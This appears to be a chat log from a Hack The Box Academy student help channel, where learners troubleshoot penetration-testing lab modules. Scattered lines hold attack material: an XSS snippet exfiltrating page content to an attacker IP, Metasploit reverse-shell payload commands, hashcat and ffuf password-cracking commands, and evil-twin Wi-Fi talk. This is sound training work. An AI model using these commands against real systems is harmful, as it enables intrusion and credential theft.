how to do it ? question : try running 'auxiliary/scanner/http/http_put' in Metasploit on any website,
on any website ?
I think you need to put the given task IP Address as RHOSTS using:
set RHOSTS <ip>
yesh they don't give ip
any website is fine
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
https://academy.hackthebox.com/module/41/section/519
I have a problem with last 2 questions
Which it's the secret key??
wow i open python -m http.server and use proxychains msfconsole and capture in burp . nice 👍
Hej guys 🙂 I am bit stuck at the moment. I am on the nmap module https://academy.hackthebox.com/module/19/section/108 and my current challenge is: 'Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. '
So I thought, sounds easy, so I tried several scripts on the target. Besides that I tried different scan parameters and I always see the same possible flag in my scan results. When I try to add the flag value as answer it always says that my answer is incorrect. I interpret the challenge description that via nmap the flag can be captured, but at the moment I question myself if I understand the description correctly. I also captured the traffic and looked through the dump, but I only see the same HTB flag again and again, which seems not to be the right answer.
Any tip would be appreciated 🙂
check for leading & trailing spaces, and try reseting the target
The key is not in the javascript. You have to understand what the javascript is doing. What do you think it's doing?
Hello, has anybody here done the module 'Introduction to Windows Evasion Techniques' section 'Process Injection', for some assistance please?
I retried my scans on a newly created target and still nothing else besides the other flag. I skipped some NSE modules like dos, exploit or vuln. But maybe the token is hidden behind a service and nmap itself is not meant to discover that flag, but that's not how I interpret that challenge tbh :/ Also tried to verify the string I copy / paste into the answer field. Tried trimming, different combinations with the only flag I found, but it's not accepted as an answer.
robots can be tricky
[yes that's a hint]
Indeed! Guess I need to figure out what scripts are invoked by which script module
i'm more meaning some that may exist on webservers 😉
hehe, i just tried to say that your hint works, but i wonder if the hint should have been part of any NSE module I already tried 🙂 I just extracted that one manually now.
Did you figure out the code yet? If you follow previous sections, it tells you also how to get secret key.
I just checked the man page of nmap and normally robots scan should have been part of default, discovery and safe. I retried the module and nmap is not spilling out the flag. The docs mention that it only lists disallowed entries. Guess from the content of the file it's not disallowed. I tried to execute the specific nse scripts for robots and it doesn't reveal anything via nmap to the console.
http-enum script says it discovered the file, but doesn't output anything. The specific script for robots has no output, except that the http service is open on port 80. What I am trying to say is, that from the challenge description I would have expected to find the flag directly via nmap output. Maybe I shouldn't care too much about the wording ^^ Thank you very much 🙂
edit: just checked the solution for that module and the answer is not what I thought the challenge description implies. So yeah, i took the words too literally.
Hi there,
Currently stuck on skills assessment for module Local File Inclusion...
I managed to do source code disclosure to identify an FI vulnerability. I have identified two security mechanisms to bypass (trying not to spoil here...) but i am not able to bypass them... even tried RFI... but stuck at this point... Any hint appreciated
Doesn't the injection occur once the calculator is spawned by a user? It's been a while since I did that module.
Have you managed to view the page source of index? This can be done using base64-encode filter from the course?
yes exactly
I DMed you
Have you managed to view the page source then?
yes I did, so i saw how the app prevents path traversal, and saw also file extension appended
Can you DM me?
i have joined a team but it still says to join a team
how to play this ctf
wrong channel
🔴 Need help with a Wi-Fi Evil Twin attack! 🔴
I'm working on an Evil Twin Attack against the PulseGrid Wi-Fi network and need some guidance.
The goal is to compromise a client device and retrieve flag.txt.
I've set up the basics, but I'm struggling to get clients to connect reliably.
Does anyone have tips on improving the attack or making the fake AP more convincing?
Any advice would be greatly appreciated!
Hi, could someone clarify whether a Stage0 payload is the same as a stager payload?
If they are the same, are there scenarios where Stage0 is handled by a stage payload?
I’m a bit confused about the distinction between stages and the different types of payloads. Could someone explain the reason for differentiating them?
This is for the ‘Using the metasploit framework’ module
stage0 is also called stager, yes. It is a very small payload that is hopefully good at being undetected that once executed is able to retrieve the real payload (which is much bigger and more likely to trigger antivirus when dropped on the harddrive) from a server into memory to then execute from there
Hi, in the "Web Attacks" Module, in IDOR section -> "Bypassing Encoded References", I can't download any contract, I am getting a 403. I found how the server is encoding but I am not even able to download my own contract, so the one with uid=1, should it be like that or is something wrong?
Hi everyone! Pivoting, Tunneling, and Port Forwarding -> RDP and SOCKS Tunneling with SocksOverRDP -> the internal windows machine is not loading properly. I can't even ping it. Been trying for couple of hours now. Super simple assessment, but I cant get it completed. Any advice?
If it's truly not loading and not user error, change servers or regions
Some devices block pings.
I know, tried RDP first (this is part of the assessment).
Let me try this real quick! Can't believe didn't think of this lol
Are you connecting as soon as it spawns? Most windows machines take a while to warm up.
If you try to connect before they're ready, they can give you issues.
No, I've been waiting for quite a while. Nearly halfway through the path already, have encountered these types of assessments before, but maybe by sheer luck never experienced any machines not loading.
Pings aside, did you nmap?
Just changed the server. Let me see if it loads in a couple of minutes or not. If not, I'll proxychains nmap the internal network. It's a double pivot assessment with RDP.
Oh, I thought this was the socksoverrdp part - that was a double pivot?
Uhh, pretty sure this isn't double
Changing regions did it!!
No it is! Foothold, then 172.16.5.19, then 172.16.6.155
that's a single pivot lol
Foothold is that first box, isn't it?
It's been a while since I did the module, but I think this was still single. Though, I would semi-recommend ignoring using socksoverRDP for this lol
Foothold is the one box. Then you SocksRDP into another, then into another. It's literally categorized as Double Pivot in the module lmao
RDP is painful sometimes in Pwnbox.
But hey, thanks for your help, both of you!!!
Personal record -- being nearly halfway done with a certificate study before crying on the relevant Discord channel!
This isn't module specific per se, but I'm trying to diagnose this issue to complete a module, so I hope it's alright:
I'm needing to use SecLists to brute force a subdomain. I often times use locate seclists | grep "something" |xclip -selection clipboard
Suddenly, even just using the "locate seclists" alone keeps giving me only the following result: /usr/share/parrot-menu/applications/parrot-seclists.desktop
I usually get a list of all the folders and wordlists and such, but now I'm getting that as the only result popping up. I've tried using git and apt to reinstall and I'm up to date. Ideas?
Run sudo updatedb
running it as sudo I'm getting permission denied
you shouldn't have permission denied on your own system
if you are; you did something very wrong 
sudo updatedb
/usr/bin/find: '/run/user/1000/doc': Permission denied
/usr/bin/find: '/run/user/1000/gvfs': Permission denied
That was the command and output of what @oblique tiger suggested
Someone can help me with this?
What manages multiple cell towers in cellular networks?
R: mobile switching center
I get an error when entering the answer
Hello, I am on the web proxy, on the step where you add your CA certificate for ZAP in Firefox. First, I am unable to find any option named dynamic SSL certificate in my tools options in ZAP or any further options to do so, and I am unable to find about:preferences#privacy. And lastly, are the CA certificates preconfigured in my HTB Academy VM??
Doing cbbh module 3
read the section and it'll give you the answer
the option has since moved from when the module was created
you can search the add-ons/plugins for cert and you should find it
it's been a minute since i set it up
I got the reverse shell, but something is wrong i havent found julio directory, am i doing something wrong?
Hello. I do not find the button to write to the support in the Academy anymore.
Here is the issue. In the module "Active Directory Enumeration & Attacks", section "DCSync", the given password does not work for the ACADEMY-EA-ATTACK01 machine. You should use the other one given in the section "LLMNR/NBT-NS Poisoning - from Linux".
bottom right of the screen, if you don't see it disable adblock/extensions
is there anyone i can talk to so i show them what i have done?
I disabled ublock and I still cannot see the button. I tried with Chromium, free of all extensions, and I do not have the button either.
You don't see a chat bubble at the bottom right?
No.
try pressing CTRL+SHIFT+R
Need some help? Learn how to reach the support team on Academy.
It changes nothing.
Also i believe one of the sections tells you the creds for the attack machine, this doesn't change
Go ahead and try the link MarcieLee provided
As it's part of the total setup
I agree but I think it is confusing.
With this link, I correctly have the button. I'll try. Thanks.
Hello please help me find the path to htb-students home directory
Hi, in the "Web Attacks" Module, in IDOR section -> "Bypassing Encoded References", I can't download any contract, I am getting a 403. I found how the server is encoding but I am not even able to download my own contract, so the one with uid=1, should it be like that or is something wrong?
Thank for confirming it ollizOr!
Hello guys. In the Information Gathering - Web Edition, for the "Creepy Crawlies" section, I'm having a hard time getting ReconSpider and scrapy to work, for a variety of different reasons. I've done both: sudo apt-get install python3-scrapy -y
(which installed properly except for Missing executable file kcmshell5 at launcher /usr/share/applications/kcm_trash.desktop)
And did the wget as instructed by the module for ReconSpider.py (I just copied and pasted it for convenience, though I can type out the commands here).
When I go to execute "python3 ReconSpider.py http://inlanefreight.com", I get an error saying "Traceback (most recent call last):
File "/home/nick/ReconSpider.py", line 6, in <module>
from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite' " (I just copied and pasted.)
Did I mess something up on the install?
hi
On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts? Can anyone give me a hint on this? I read the text 10 times and did not find the answer. Broken Authentication
Brute-Forcing Password Reset Tokens
solved
Stuck on Advanced XSS and CSRF Exploitation XSS Filter Bypasses for the past day or so. Anyone free to give me a pointer?
Are you stuck trying to find a filter bypass that works or something else
Got the xss bypass and can get an alert showing from the exploit server but when I try to do a xhr.open on '/home.php' and access the guestbook myself, I keep getting "Uncaught DOMException: XMLHttpRequest.open: '/home.php' is not a valid URL." When I put in the full URL I get CORS errors.
Maybe there's another endpoint you can reach instead of home.php 😉
I know about admin but I can't even get the script to run under my own context.
don't include the port if you're including that on the exfil page
exfil.open("GET", "https://10.10.x.x/exfil?r=" + btoa(xhr.responseText), false); - But not getting this far in my script. Can't call the /home.php to get the source.
you can DM me your whole code
Okay yeah the module changed since I did it and I don't have time to go re-do it right now sorry maybe someone else can assist
If you're still stuck on this I don't mind checking what you've got going on.
👍
Hello Guys can anyone explain me why when i give command in msfconsole set payload windows/meterpreter/x64/reverse_tcp it throws me an error
something like wrong payload given for msf
its windows/x64
meterpreter/windows/x64??
Question: https://academy.hackthebox.com/module/24/section/514
-- Web Upload part
- Why do we even need that self-signed certificate for this scenario?
Or is this just for the pwnbox specifically?
Check dm
So you can use https and send the data encrypted instead of plaintext.
windows/x64/meterpreter
Aren't you supposed to be in a handler first?
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp
It's just odd, why would we need to do that ?
Cheers for the reply
I literally said why in the message you replied to
I mean yeah we encrypt the data, I'm trying to understand "why?" - considering we are just uploading files why would that matter compared to plaintext.
because someone else can see it?
so no one can snoop on the data and see it in plaintext
Got it
cheers, just was curious 😄
This tells me that payload is wrong
i just told you it
Hello guys... I'm having an issue getting ReconSpider and Scrapy to work together... It's from the module "Information Gathering-Web Edition". Since it has to do with troubleshooting why those tools aren't working properly on my machine and not the module per se (Though I need them for the module), can I still ask here? If not, can I DM someone that is willing to help?
if anyones done process injection, detecting dll injection lmk
Hey guys, I'm having trouble with the linux fundamentals module. In the system information portion it is having me ssh into a target and pull information, but when I ssh into it, it doesn't give me the expected user/password prompts, just a password prompt for root@(Target) and the provided password does not work so I can't complete the module. I'm using my own VM and yes I have openvpn runing with the provided config file. Screen shot of issue
SSH does not prompt for user. It is passed in the command by doing ssh user@host
hey guys um for some reason hashcat isn't working for some stupid reason
If you do not pass a user, it uses the current user that you are.
ahhhhh ok thank you
i have 0 clue why it isn't working and if you're wondering this is footprinting ipmi
someone pleaseeee help
look at your error Token length exception
Token length exception meaning you're either using a wrong token type -m or the file contains an error
it's because your hash is not what hashcat is expecting
i showed yall my file
You need to correctly identify your hash
what type of hash it is idk man
that admin: part is the username
ok ill be back please wait for me
the : separates the username from the hash
do i remove everything up to the second admin?
you need only the hash, not the username
┌─[us-academy-2]─[10.10.14.179]─[htb-ac-1794577@htb-hhgg3i1yqu]─[~]
└──╼ [★]$ hashcat -m 7300 file.txt -a 3 ?a?a?a?a?a?a?a?a --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped
OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
- Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile 'file.txt' on line 1 (a8d32d4ab85dc7e35b71a04f7355fc3d6ebb38c0): Separator unmatched
No hashes loaded.
Started: Fri Mar 21 17:47:02 2025
Stopped: Fri Mar 21 17:47:02 2025
┌─[us-academy-2]─[10.10.14.179]─[htb-ac-1794577@htb-hhgg3i1yqu]─[~]
└──╼ [★]$
new error 🔥
Hello guys, I'm still having problems getting ReconSpider and Scrapy to work... I think the issue is Scrapy because when I run ReconSpider, it keeps saying it can't find a python script from Scrapy. I've tried what feels like everything under the sun, and even running updatedb or sudo updatedb keeps giving me permission denied.... (which I don't get how I'm getting permission denied as a super user). This is all needed for the Information Gathering - Web Edition.
i believe you're using the wrong hashcat mode
do not post module content above tier 0
sorry
try just using metasploit
i used metasploit alr
then it should have outputted the password
Try to identify the hash type first, then lookup the mode in hashcat documentation, to my understanding.
it is an IPMI hash
🙂
hash-identifier
use -m 100
i've used hashid in the past and it spat out 15 million different hash types before so i have been skeptical of its analysis
but i'm just wrong this time so L
https://www.tunnelsup.com/hash-analyzer/ I used this
A tool to determine the type of hash
I recommend this. it's pretty accurate most of the time
oh my god you fucking goat
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 1 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
what do i click?
nothing you can just let it run
thank you my goats
Baaaaaa
reading the section actually helps, who knew
bro the section says -7300
that gave me an error bro
remove the admin: part
only remove the admin:
you used the command straight from the section, yes?
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
that is for HP iLO
thank you goats!! now i just wait
it's Footprinting - IPMI
if you identified the IPMI service as HP iLO then you'd probably run this command
otherwise the hashcat mode should be set to 0 and you'd run it against some password list like rockyou.txt
i'll give you a hint, the IPMI service is not HP iLO
bro i dont want hints anymore im just mad
also for some reason my rockyou.txt is fricking rockyou.txt.gz
just use gunzip
7300 is correct for any ipmi hash btw
yes but the hashcat mode is wrong for cracking non-HP iLOs
Hey everyone so im new to Cybersecurity any tips on how to learn Linux from basics im currently trying to log into SSH and having issues . Sorry for such a basic question
The mask is what makes the iLo one unique
Google is your friend
How to do X in Linux is in a fair bit of my search history
There is also a linux fundamentals module IIRC
I hope its ok to bump this again: I'm still having problems getting ReconSpider and Scrapy to work... I think the issue is Scrapy because when I run ReconSpider, it keeps saying it cant find a python script from Scrapy. I've tried what feels like everything under the sun, and even running updatedb or sudo updatedb keeps giving me permission denied.... (which I dont get how I'm getting permission denied as a super user). This is all needed for the information gathering-web edition.
Are you downloading ReconSpider from the link? Also sudo pip3 install scrapy --break-system-packages
The ReconSpider on github is a completely different one than the module one
I typed the exact commands in the module. Let me try what you just suggested to see if it works.
you can always try:
pipx install scrapy
so that you don't risk breaking your sys packages 🙂
When I tried using pipx or pip3, I keep getting a "This is externally managed" type of error
isn't scrapy a python library too
i also tried sudo apt-get install python3-scrapy (I think was it off the top of my head)
From what I've gathered, yes
then pipx won't work
@fathom pendant sudo pip3 install scrapy --break-system-packages
Requirement already satisfied: scrapy in /usr/lib/python3/dist-packages (2.8.0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
just install it in a python venv. python3 -m venv venv, then activate the venv
Thats a warning
Doesn't mean it didn't work
I'm getting the same error running recon spider atm
What is the exact error
why cant i echo a file within /usr/share/wordlists
you can cat a file
Traceback (most recent call last):
File "/home/nick/ReconSpider.py", line 6, in <module>
from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'
like i only have a read only permissions on this file even tho im on the pwnbox vm??
like im trying to add the hash to this empty file i just made
I forget the fix to this as I didn't run into this
echo just echoes out what you type in the terminal. To display a file you can use cat (short for concatenate) or less
But you can probably search the channel
you can just put the hash in a file in your home dir
all you have to do is crack the hash with hashcat
Thanks! I've attempted this not sure what im missing but can't correctly login via SSH
kk. If I'm unable to find a fix, is there an alternate spidering tool I can try to use that you are aware of so I can complete the question in this section?
what you could do instead is use the metasploit module again
but change one of the options
there is an option called PASS_FILE
Hiya! Can anyone tell me why this ffuf command is throwing an error?
ffuf -w users.txt:FUZZU -w /usr/share/wordlists/rockyou.txt:FUZZP -u http://<IP>:8081/auth?login=FUZZU&password=FUZZP
It gives me a "FUZZP defined but not found in headers [...]" error, and I can't see why
Not that comes to mind
The only thing I noticed of relevance in the search is you pinging someone (maybe the dev?) about an issue... but the issue seemed to be pwnbox related from what I gathered, and the other suggestions said to use a virtual environment... which I am, so idk.
I even tried locating "scrapy.downloadermiddlewares.offsite" to see if it's in a different spot to try to point reconspider to it, but it returns nothing.
(that is the locate command)
@rotund fulcrum this is not the server to ask about that
that's because that's more of an internal thing to the scrapy module than it is a python module
wait so metasploit will take a while if i set the passfile to rockyou.txt cus its cracking the hash right?
is locate not able to find a file that way?
Also, imma try one more thing that I just thought of.
if it's a big password list then yea it'll probably take a while
i said run and i have no errors just an empty line so its just running rn right?
I GOT IT YES YES YES YES
great
now i just nc and log in right?
for reference if you want to crack it in hashcat the command would be hashcat -m 7300 <hashfile> <passwordlist>
there's a hashcat module which isn't in the pentester path but is a good module to take
will put this down for later use but do i just nc and log in for IPMI?
i was overthinking i just looked at the questions i alr got it
@fathom pendant (I feel like I'm annoying you... I'm simultaneously sincerely sorry if I am, and incredibly grateful for your help the past few days).
so I tried locate scrapy | grep "offsite", I had 2 file paths get returned, one of interest being
"/usr/lib/python3/dist-packages/scrapy/spidermiddlewares/offsite.py"
Do you know how to get ReconSpider to look there instead of the other file path it was trying to?
could be a slight version difference between the sudo apt install python3-scrapy and the sudo pip3 install scrapy
if you change the downloadermiddlewares to spidermiddlewares it'll work
I used pip3 (as recommended from the module)
And in regards to the change, just nano the reconspider.py I assume?
I would like to officially anoint @fathom pendant into sainthood.
Oh but I didn't spoil anything? @fathom pendant ?
My command doesn't even work so ^^
background in screenshot could be revealing more than you intend and your fuzz being crafted
I will ask again without screens then
My bad ^^
Hey guys I'm stuck on a SSRF problem module server-side attacks section blind ssrf, I'm doing a ffuf command to identify the open port but I receive nothing, even if I want to find the closed ports any help?
Omg just a stupid typo in the command 🤡
My bad chat i figured it out
Hey all, new here. I have a question about a possible technical bug in a module. Do i just ask here?
assuming, i do ask here my issue is in the WordPress module. In the final skills assessment, the target VM is a website, but it's not a WordPress website so none of the answers can be located. Am i missing something?
I am using PwnBox not my own VM.
Which module/section is it? I doubt I'd be much help, but I can try.
the Hacking WordPress Module, Skill Assessment section
Enumeration is key.
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
enumeration fails with wpscan
I dont have that module unlocked, so I'll let SuperNuts take the reins if he's still around and able.
Is it a public IP?
no it's a local 10.x.x.x ip
Thanks
Read the overview and scenario on the skill assessment page.
dumb question probably: Can I specify a port in my /etc/hosts file?
DNS is not concerned with ports.
I've read it 10 times now. It says public facing website, but the ip given is private.
I have a vHost that it says I need... but there is a public IP with a port for a target?
Actually, I feel like an idiot, ignore me.
Thanks for helping me. Sorry i'm a noob
it's all part of the learning process
I just don't understand how i'm supposed to get a WordPress version number of a website that isn't WordPress
Look around the website
will do. i'm checking the source code. Thanks for the encouragement 🙂
ok this is a static html site, not WP i'm sure of it
Not sure if it would help: But try Wappalyzer or nikto to try to enumerate with either of those?
trying nikto now. Thanks for the tip
For sure.
idk, it just says Apache but still no sign of anything WordPress
Click every link
I have
half of them are email or just "#"
I found one link that goes off-site but it's broken
it has a .local but inside pwnbox that won't open
Again, read the overview and scenario on the page.
totally lost
There's a note you should pay attention to
So i was able to get the blog working by editing the /etc/hosts/ file. Thanks for the nudges everyone
Good ole DNS. Glad you got it!
😆
oh my i'm on the very last question and i'm stuck. The question is vague
still on the Hacking WordPress Skill Assessment
the question is: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
"a flag" ? which flag?
I reviewed the wpscan output and i know which plugin is vulnerable. I just don't know what flag to look for
the question says where to look
?
The question provides the directory to look in for the flag.
yo im on the cpts footprinting easy lab and im lowk stuck because i cant rly find anything
ftp anonymous log in isnt working and my dns enumeration was kinda ass too
im just kind of lost and id assume id have to go to ftp so i can find this stupid flag but im js stuck
figured this out thanks @cloud urchin
Have you used the provided IP as the dns server? It should come up with stuff you were taught
yeah i did actually
As the module is above tier 0, dm me to avoid spoilers. I’ll see what I can do over my phone.
hey @cloud urchin sorry buddy still stuck. I was able to find the reverseshell, but there's no flag in the plugin folder
Read what the question is asking you
supernuts please help
I don't have notes on that
i do i thought u js died
id rly want ur advice ngl cus i plan to take cwee after this
i was js talking to nuts about it but idk where to go from here
I am, but i must not be good enough with English because this doesn't tell me where to look. "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download."
I'm 8 hours into a 6 hour module because of this question 😦
Don't feel pressured by the estimated times, those are for best case scenario
I thought you were on the last question?
I am, I still haven't found any flags
😎
the wordpress module?
yes
the question says look in the directory and it gives you the path it's in
